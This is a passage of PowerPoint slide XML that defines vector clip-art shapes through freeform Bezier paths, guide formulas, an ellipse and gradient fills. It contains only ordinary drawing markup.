                        <a:pt x="106" y="187"/>
                        <a:pt x="113" y="188"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="121" y="190"/>
                        <a:pt x="137" y="180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0"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="78"/>
                        <a:pt x="137" y="73"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="75"/>
                        <a:pt x="138" y="81"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="141" y="109"/>
                        <a:pt x="148" y="149"/>
                        <a:pt x="159" y="203"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="165" y="231"/>
                        <a:pt x="198" y="218"/>
                        <a:pt x="192" y="194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50000">
                      <a:srgbClr val="FFFFFF">
                        <a:gamma/>
                        <a:shade val="85882"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FFFFFF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Freeform 583"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="2100" y="2523"/>
                  <a:ext cx="118" cy="252"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 87 w 87"/>
                    <a:gd name="T1" fmla="*/ 103 h 185"/>
                    <a:gd name="T2" fmla="*/ 63 w 87"/>
                    <a:gd name="T3" fmla="*/ 122 h 185"/>
                    <a:gd name="T4" fmla="*/ 63 w 87"/>
                    <a:gd name="T5" fmla="*/ 122 h 185"/>
                    <a:gd name="T6" fmla="*/ 63 w 87"/>
                    <a:gd name="T7" fmla="*/ 41 h 185"/>
                    <a:gd name="T8" fmla="*/ 76 w 87"/>
                    <a:gd name="T9" fmla="*/ 15 h 185"/>
                    <a:gd name="T10" fmla="*/ 63 w 87"/>
                    <a:gd name="T11" fmla="*/ 12 h 185"/>
                    <a:gd name="T12" fmla="*/ 49 w 87"/>
                    <a:gd name="T13" fmla="*/ 37 h 185"/>
                    <a:gd name="T14" fmla="*/ 49 w 87"/>
                    <a:gd name="T15" fmla="*/ 118 h 185"/>
                    <a:gd name="T16" fmla="*/ 19 w 87"/>
                    <a:gd name="T17" fmla="*/ 110 h 185"/>
                    <a:gd name="T18" fmla="*/ 18 w 87"/>
                    <a:gd name="T19" fmla="*/ 29 h 185"/>
                    <a:gd name="T20" fmla="*/ 31 w 87"/>
                    <a:gd name="T21" fmla="*/ 3 h 185"/>
                    <a:gd name="T22" fmla="*/ 21 w 87"/>
                    <a:gd name="T23" fmla="*/ 0 h 185"/>
                    <a:gd name="T24" fmla="*/ 6 w 87"/>
                    <a:gd name="T25" fmla="*/ 26 h 185"/>
                    <a:gd name="T26" fmla="*/ 6 w 87"/>
                    <a:gd name="T27" fmla="*/ 107 h 185"/>
                    <a:gd name="T28" fmla="*/ 1 w 87"/>
                    <a:gd name="T29" fmla="*/ 99 h 185"/>
                    <a:gd name="T30" fmla="*/ 0 w 87"/>
                    <a:gd name="T31" fmla="*/ 159 h 185"/>
                    <a:gd name="T32" fmla="*/ 10 w 87"/>
                    <a:gd name="T33" fmla="*/ 170 h 185"/>
                    <a:gd name="T34" fmla="*/ 61 w 87"/>
                    <a:gd name="T35" fmla="*/ 184 h 185"/>
                    <a:gd name="T36" fmla="*/ 87 w 87"/>
                    <a:gd name="T37" fmla="*/ 164 h 185"/>
                    <a:gd name="T38" fmla="*/ 87 w 87"/>
                    <a:gd name="T39" fmla="*/ 103 h 1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87" h="185">
                      <a:moveTo>
                        <a:pt x="87" y="103"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="84" y="113"/>
                        <a:pt x="72" y="121"/>
                        <a:pt x="63" y="122"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="63" y="122"/>
                        <a:pt x="63" y="122"/>
                        <a:pt x="63" y="122"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="63" y="122"/>
                        <a:pt x="63" y="51"/>
                        <a:pt x="63" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="63" y="30"/>
                        <a:pt x="71" y="15"/>
                        <a:pt x="76" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="63" y="12"/>
                        <a:pt x="63" y="12"/>
                        <a:pt x="63" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="58" y="12"/>
                        <a:pt x="50" y="26"/>
                        <a:pt x="49" y="37"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="48" y="49"/>
                        <a:pt x="49" y="118"/>
                        <a:pt x="49" y="118"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="40" y="116"/>
                        <a:pt x="28" y="112"/>
                        <a:pt x="19" y="110"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="108"/>
                        <a:pt x="18" y="39"/>
                        <a:pt x="18" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="18"/>
                        <a:pt x="27" y="3"/>
                        <a:pt x="31" y="3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16" y="0"/>
                        <a:pt x="7" y="15"/>
                        <a:pt x="6" y="26"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="37"/>
                        <a:pt x="6" y="100"/>
                        <a:pt x="6" y="107"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="105"/>
                        <a:pt x="2" y="102"/>
                        <a:pt x="1" y="99"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="119"/>
                        <a:pt x="0" y="141"/>
                        <a:pt x="0" y="159"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="164"/>
                        <a:pt x="4" y="169"/>
                        <a:pt x="10" y="170"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="22" y="172"/>
                        <a:pt x="53" y="182"/>
                        <a:pt x="61" y="184"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="69" y="185"/>
                        <a:pt x="85" y="176"/>
                        <a:pt x="87" y="164"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="87" y="144"/>
                        <a:pt x="87" y="123"/>
                        <a:pt x="87" y="1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ED563"/>
                    </a:gs>
                    <a:gs pos="50000">
                      <a:srgbClr val="FED563">
                        <a:gamma/>
                        <a:shade val="85882"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FED563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Freeform 584"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="2114" y="2500"/>
                  <a:ext cx="88" cy="55"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 29 w 66"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 9 w 66"/>
                    <a:gd name="T3" fmla="*/ 23 h 41"/>
                    <a:gd name="T4" fmla="*/ 15 w 66"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
                    <a:gd name="T6" fmla="*/ 53 w 66"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 57 w 66"/>
                    <a:gd name="T9" fmla="*/ 30 h 41"/>
                    <a:gd name="T10" fmla="*/ 29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29" y="39"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="37"/>
                        <a:pt x="0" y="25"/>
                        <a:pt x="9" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="21"/>
                        <a:pt x="13" y="16"/>
                        <a:pt x="15" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="10"/>
                        <a:pt x="53" y="0"/>
                        <a:pt x="53" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="53" y="21"/>
                        <a:pt x="47" y="25"/>
                        <a:pt x="57" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="66" y="33"/>
                        <a:pt x="46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19" name="Oval 585"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2108" y="2431"/>
                  <a:ext cx="106" cy="105"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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20" name="Freeform 586"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="2108" y="2429"/>
                  <a:ext cx="128" cy="68"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 54 w 94"/>
                    <a:gd name="T1" fmla="*/ 1 h 50"/>
                    <a:gd name="T2" fmla="*/ 49 w 94"/>
                    <a:gd name="T3" fmla="*/ 1 h 50"/>
                    <a:gd name="T4" fmla="*/ 48 w 94"/>
                    <a:gd name="T5" fmla="*/ 1 h 50"/>
                    <a:gd name="T6" fmla="*/ 44 w 94"/>
                    <a:gd name="T7" fmla="*/ 2 h 50"/>
                    <a:gd name="T8" fmla="*/ 43 w 94"/>
                    <a:gd name="T9" fmla="*/ 3 h 50"/>
                    <a:gd name="T10" fmla="*/ 39 w 94"/>
                    <a:gd name="T11" fmla="*/ 4 h 50"/>
                    <a:gd name="T12" fmla="*/ 39 w 94"/>
                    <a:gd name="T13" fmla="*/ 4 h 50"/>
                    <a:gd name="T14" fmla="*/ 35 w 94"/>
                    <a:gd name="T15" fmla="*/ 6 h 50"/>
                    <a:gd name="T16" fmla="*/ 34 w 94"/>
                    <a:gd name="T17" fmla="*/ 7 h 50"/>
                    <a:gd name="T18" fmla="*/ 31 w 94"/>
                    <a:gd name="T19" fmla="*/ 9 h 50"/>
                    <a:gd name="T20" fmla="*/ 30 w 94"/>
                    <a:gd name="T21" fmla="*/ 10 h 50"/>
                    <a:gd name="T22" fmla="*/ 21 w 94"/>
                    <a:gd name="T23" fmla="*/ 20 h 50"/>
                    <a:gd name="T24" fmla="*/ 21 w 94"/>
                    <a:gd name="T25" fmla="*/ 21 h 50"/>
                    <a:gd name="T26" fmla="*/ 21 w 94"/>
                    <a:gd name="T27" fmla="*/ 21 h 50"/>
                    <a:gd name="T28" fmla="*/ 20 w 94"/>
                    <a:gd name="T29" fmla="*/ 23 h 50"/>
                    <a:gd name="T30" fmla="*/ 20 w 94"/>
                    <a:gd name="T31" fmla="*/ 23 h 50"/>
                    <a:gd name="T32" fmla="*/ 0 w 94"/>
                    <a:gd name="T33" fmla="*/ 35 h 50"/>
                    <a:gd name="T34" fmla="*/ 10 w 94"/>
                    <a:gd name="T35" fmla="*/ 34 h 50"/>
                    <a:gd name="T36" fmla="*/ 16 w 94"/>
                    <a:gd name="T37" fmla="*/ 36 h 50"/>
                    <a:gd name="T38" fmla="*/ 20 w 94"/>
                    <a:gd name="T39" fmla="*/ 37 h 50"/>
                    <a:gd name="T40" fmla="*/ 40 w 94"/>
                    <a:gd name="T41" fmla="*/ 48 h 50"/>
                    <a:gd name="T42" fmla="*/ 57 w 94"/>
                    <a:gd name="T43" fmla="*/ 40 h 50"/>
                    <a:gd name="T44" fmla="*/ 94 w 94"/>
                    <a:gd name="T45" fmla="*/ 34 h 50"/>
                    <a:gd name="T46" fmla="*/ 54 w 94"/>
                    <a:gd name="T47" fmla="*/ 1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94" h="50">
                      <a:moveTo>
                        <a:pt x="54" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="52" y="1"/>
                        <a:pt x="51" y="1"/>
                        <a:pt x="49" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="49" y="1"/>
                        <a:pt x="48" y="1"/>
                        <a:pt x="48" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="47" y="2"/>
                        <a:pt x="46" y="2"/>
                        <a:pt x="44" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="2"/>
                        <a:pt x="44" y="2"/>
                        <a:pt x="43" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="3"/>
                        <a:pt x="41" y="3"/>
                        <a:pt x="39" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="39" y="4"/>
                        <a:pt x="39" y="4"/>
                        <a:pt x="39" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="37" y="5"/>
                        <a:pt x="36" y="6"/>
                        <a:pt x="35" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="35" y="6"/>
                        <a:pt x="35" y="7"/>
                        <a:pt x="34" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="33" y="7"/>
                        <a:pt x="32" y="8"/>
                        <a:pt x="31" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="31" y="9"/>
                        <a:pt x="31" y="9"/>
                        <a:pt x="30" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="13"/>
                        <a:pt x="24" y="16"/>
                        <a:pt x="21" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21" y="21"/>
                        <a:pt x="21" y="21"/>
                        <a:pt x="21" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21" y="21"/>
                        <a:pt x="21" y="21"/>
                        <a:pt x="21" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21" y="22"/>
                        <a:pt x="20" y="22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17" y="27"/>
                        <a:pt x="3" y="32"/>
                        <a:pt x="0" y="35"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="32"/>
                        <a:pt x="6" y="33"/>
                        <a:pt x="10" y="34"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="34"/>
                        <a:pt x="14" y="35"/>
                        <a:pt x="16" y="36"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="36"/>
                        <a:pt x="19" y="37"/>
                        <a:pt x="20" y="37"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="41"/>
                        <a:pt x="34" y="50"/>
                        <a:pt x="40" y="48"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="40" y="48"/>
                        <a:pt x="51" y="40"/>
                        <a:pt x="57" y="40"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="84" y="41"/>
                        <a:pt x="94" y="34"/>
                        <a:pt x="94" y="34"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="92" y="14"/>
                        <a:pt x="74" y="0"/>
                        <a:pt x="54" y="1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ED563"/>
                    </a:gs>
                    <a:gs pos="50000">
                      <a:srgbClr val="FED563">
                        <a:gamma/>
                        <a:shade val="85882"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FED563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6" name="Group 587"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="3600" y="2480"/>
                <a:ext cx="106" cy="210"/>
                <a:chOff x="1388" y="2602"/>
                <a:chExt cx="323" cy="637"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="401" name="Group 588"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1445" y="2602"/>
                  <a:ext cx="266" cy="637"/>
                  <a:chOff x="2022" y="2429"/>
                  <a:chExt cx="266" cy="637"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="409" name="Freeform 589"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="2100" y="2737"/>
                    <a:ext cx="121" cy="329"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 89 w 90"/>
                      <a:gd name="T1" fmla="*/ 156 h 245"/>
                      <a:gd name="T2" fmla="*/ 90 w 90"/>
                      <a:gd name="T3" fmla="*/ 7 h 245"/>
                      <a:gd name="T4" fmla="*/ 89 w 90"/>
                      <a:gd name="T5" fmla="*/ 5 h 245"/>
                      <a:gd name="T6" fmla="*/ 63 w 90"/>
                      <a:gd name="T7" fmla="*/ 20 h 245"/>
                      <a:gd name="T8" fmla="*/ 12 w 90"/>
                      <a:gd name="T9" fmla="*/ 10 h 245"/>
                      <a:gd name="T10" fmla="*/ 3 w 90"/>
                      <a:gd name="T11" fmla="*/ 0 h 245"/>
                      <a:gd name="T12" fmla="*/ 3 w 90"/>
                      <a:gd name="T13" fmla="*/ 36 h 245"/>
                      <a:gd name="T14" fmla="*/ 2 w 90"/>
                      <a:gd name="T15" fmla="*/ 205 h 245"/>
                      <a:gd name="T16" fmla="*/ 44 w 90"/>
                      <a:gd name="T17" fmla="*/ 204 h 245"/>
                      <a:gd name="T18" fmla="*/ 45 w 90"/>
                      <a:gd name="T19" fmla="*/ 51 h 245"/>
                      <a:gd name="T20" fmla="*/ 36 w 90"/>
                      <a:gd name="T21" fmla="*/ 39 h 245"/>
                      <a:gd name="T22" fmla="*/ 45 w 90"/>
                      <a:gd name="T23" fmla="*/ 51 h 245"/>
                      <a:gd name="T24" fmla="*/ 44 w 90"/>
                      <a:gd name="T25" fmla="*/ 204 h 245"/>
                      <a:gd name="T26" fmla="*/ 44 w 90"/>
                      <a:gd name="T27" fmla="*/ 211 h 245"/>
                      <a:gd name="T28" fmla="*/ 88 w 90"/>
                      <a:gd name="T29" fmla="*/ 218 h 245"/>
                      <a:gd name="T30" fmla="*/ 89 w 90"/>
                      <a:gd name="T31" fmla="*/ 156 h 2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90" h="245">
                        <a:moveTo>
                          <a:pt x="89" y="156"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="89" y="140"/>
                          <a:pt x="90" y="47"/>
                          <a:pt x="90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7" y="16"/>
                          <a:pt x="71" y="22"/>
                          <a:pt x="63" y="20"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="55" y="19"/>
                          <a:pt x="24" y="13"/>
                          <a:pt x="12" y="10"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6" y="9"/>
                          <a:pt x="4" y="4"/>
                          <a:pt x="3" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="18"/>
                          <a:pt x="3" y="32"/>
                          <a:pt x="3" y="36"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3" y="49"/>
                          <a:pt x="0" y="181"/>
                          <a:pt x="2" y="205"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3" y="228"/>
                          <a:pt x="43" y="224"/>
                          <a:pt x="44" y="204"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="170"/>
                          <a:pt x="46" y="55"/>
                          <a:pt x="45" y="51"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="45" y="47"/>
                          <a:pt x="36" y="46"/>
                          <a:pt x="36" y="39"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="36" y="46"/>
                          <a:pt x="45" y="47"/>
                          <a:pt x="45" y="51"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="46" y="55"/>
                          <a:pt x="43" y="170"/>
                          <a:pt x="44" y="204"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="206"/>
                          <a:pt x="44" y="211"/>
                          <a:pt x="44" y="211"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="46" y="245"/>
                          <a:pt x="87" y="235"/>
                          <a:pt x="88" y="218"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="90" y="201"/>
                          <a:pt x="88" y="171"/>
                          <a:pt x="89" y="15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ED563"/>
                      </a:gs>
                      <a:gs pos="50000">
                        <a:srgbClr val="FED563">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:srgbClr>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="FED563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0" name="Freeform 590"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="2022" y="2517"/>
                    <a:ext cx="266" cy="310"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 192 w 198"/>
                      <a:gd name="T1" fmla="*/ 194 h 231"/>
                      <a:gd name="T2" fmla="*/ 169 w 198"/>
                      <a:gd name="T3" fmla="*/ 49 h 231"/>
                      <a:gd name="T4" fmla="*/ 143 w 198"/>
                      <a:gd name="T5" fmla="*/ 24 h 231"/>
                      <a:gd name="T6" fmla="*/ 100 w 198"/>
                      <a:gd name="T7" fmla="*/ 12 h 231"/>
                      <a:gd name="T8" fmla="*/ 60 w 198"/>
                      <a:gd name="T9" fmla="*/ 2 h 231"/>
                      <a:gd name="T10" fmla="*/ 30 w 198"/>
                      <a:gd name="T11" fmla="*/ 11 h 231"/>
                      <a:gd name="T12" fmla="*/ 4 w 198"/>
                      <a:gd name="T13" fmla="*/ 159 h 231"/>
                      <a:gd name="T14" fmla="*/ 36 w 198"/>
                      <a:gd name="T15" fmla="*/ 168 h 231"/>
                      <a:gd name="T16" fmla="*/ 54 w 198"/>
                      <a:gd name="T17" fmla="*/ 47 h 231"/>
                      <a:gd name="T18" fmla="*/ 53 w 198"/>
                      <a:gd name="T19" fmla="*/ 164 h 231"/>
                      <a:gd name="T20" fmla="*/ 62 w 198"/>
                      <a:gd name="T21" fmla="*/ 174 h 231"/>
                      <a:gd name="T22" fmla="*/ 113 w 198"/>
                      <a:gd name="T23" fmla="*/ 188 h 231"/>
                      <a:gd name="T24" fmla="*/ 140 w 198"/>
                      <a:gd name="T25" fmla="*/ 169 h 231"/>
                      <a:gd name="T26" fmla="*/ 140 w 198"/>
                      <a:gd name="T27" fmla="*/ 169 h 231"/>
                      <a:gd name="T28" fmla="*/ 138 w 198"/>
                      <a:gd name="T29" fmla="*/ 87 h 231"/>
                      <a:gd name="T30" fmla="*/ 136 w 198"/>
                      <a:gd name="T31" fmla="*/ 70 h 231"/>
                      <a:gd name="T32" fmla="*/ 136 w 198"/>
                      <a:gd name="T33" fmla="*/ 69 h 231"/>
                      <a:gd name="T34" fmla="*/ 136 w 198"/>
                      <a:gd name="T35" fmla="*/ 70 h 231"/>
                      <a:gd name="T36" fmla="*/ 138 w 198"/>
                      <a:gd name="T37" fmla="*/ 87 h 231"/>
                      <a:gd name="T38" fmla="*/ 159 w 198"/>
                      <a:gd name="T39" fmla="*/ 203 h 231"/>
                      <a:gd name="T40" fmla="*/ 192 w 198"/>
                      <a:gd name="T41" fmla="*/ 194 h 2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98" h="231">
                        <a:moveTo>
                          <a:pt x="192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6"/>
                          <a:pt x="143" y="24"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="135" y="21"/>
                          <a:pt x="113" y="16"/>
                          <a:pt x="100" y="12"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="88" y="9"/>
                          <a:pt x="69" y="3"/>
                          <a:pt x="60" y="2"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="51" y="0"/>
                          <a:pt x="33" y="3"/>
                          <a:pt x="30" y="11"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="28" y="17"/>
                          <a:pt x="8" y="139"/>
                          <a:pt x="4" y="159"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="180"/>
                          <a:pt x="31" y="184"/>
                          <a:pt x="36" y="168"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="40" y="157"/>
                          <a:pt x="55" y="38"/>
                          <a:pt x="54" y="47"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="54" y="53"/>
                          <a:pt x="53" y="121"/>
                          <a:pt x="53" y="164"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="54" y="169"/>
                          <a:pt x="56" y="173"/>
                          <a:pt x="62" y="174"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="74" y="177"/>
                          <a:pt x="106" y="187"/>
                          <a:pt x="113" y="188"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="121" y="190"/>
                          <a:pt x="137" y="180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0"/>
                          <a:pt x="138" y="87"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="137" y="78"/>
                          <a:pt x="137" y="73"/>
                          <a:pt x="136" y="70"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="136" y="69"/>
                          <a:pt x="136" y="69"/>
                          <a:pt x="136" y="69"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="136" y="69"/>
                          <a:pt x="136" y="69"/>
                          <a:pt x="136" y="70"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="137" y="75"/>
                          <a:pt x="138" y="81"/>
                          <a:pt x="138" y="87"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="141" y="109"/>
                          <a:pt x="148" y="149"/>
                          <a:pt x="159" y="203"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="165" y="231"/>
                          <a:pt x="198" y="218"/>
                          <a:pt x="192" y="194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FFFF"/>
                      </a:gs>
                      <a:gs pos="50000">
                        <a:srgbClr val="FFFFFF">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:srgbClr>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="FFFFFF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1" name="Freeform 591"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="2100" y="2523"/>
                    <a:ext cx="118" cy="252"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 87 w 87"/>
                      <a:gd name="T1" fmla="*/ 103 h 185"/>
                      <a:gd name="T2" fmla="*/ 63 w 87"/>
                      <a:gd name="T3" fmla="*/ 122 h 185"/>
                      <a:gd name="T4" fmla="*/ 63 w 87"/>
                      <a:gd name="T5" fmla="*/ 122 h 185"/>
                      <a:gd name="T6" fmla="*/ 63 w 87"/>
                      <a:gd name="T7" fmla="*/ 41 h 185"/>
                      <a:gd name="T8" fmla="*/ 76 w 87"/>
                      <a:gd name="T9" fmla="*/ 15 h 185"/>
                      <a:gd name="T10" fmla="*/ 63 w 87"/>
                      <a:gd name="T11" fmla="*/ 12 h 185"/>
                      <a:gd name="T12" fmla="*/ 49 w 87"/>
                      <a:gd name="T13" fmla="*/ 37 h 185"/>
                      <a:gd name="T14" fmla="*/ 49 w 87"/>
                      <a:gd name="T15" fmla="*/ 118 h 185"/>
                      <a:gd name="T16" fmla="*/ 19 w 87"/>
                      <a:gd name="T17" fmla="*/ 110 h 185"/>
                      <a:gd name="T18" fmla="*/ 18 w 87"/>
                      <a:gd name="T19" fmla="*/ 29 h 185"/>
                      <a:gd name="T20" fmla="*/ 31 w 87"/>
                      <a:gd name="T21" fmla="*/ 3 h 185"/>
